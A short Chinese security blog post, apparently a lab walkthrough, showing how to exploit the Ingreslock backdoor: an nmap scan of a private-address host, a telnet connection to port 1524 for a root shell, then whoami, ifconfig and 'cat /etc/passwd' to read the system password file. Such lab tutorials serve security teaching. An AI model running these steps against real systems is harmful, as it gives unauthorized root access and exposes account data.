Ingreslock后门漏洞

admin 2021年8月13日08:24:37评论138 views字数 409阅读1分21秒阅读模式

利用telnet命令连接目标主机的1524端口,直接获取root权限。


Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限, 经常被用于入侵一个暴露的服务器。


 一、 利用nmap工具扫描目标主机

1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。


1.2 在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放1524端口。

Ingreslock后门漏洞


1.3 在终端中输入命令“telnet 192.168.1.3 1524”,连接目标主机1524端口,先是连接成功。如图3所示


1.4 在终端中输入命令“whoami”,查找获取的权限。如图4所示

Ingreslock后门漏洞

1.5 在终端中输入命令“ifconfig eth0”,查看网卡信息,在终端下输入“cat /etc/passwd”,查看远程主机的密码文件。

Ingreslock后门漏洞

本文始发于微信公众号(飓风网络安全):Ingreslock后门漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月13日08:24:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ingreslock后门漏洞http://cn-sec.com/archives/359274.html

发表评论

匿名网友 填写信息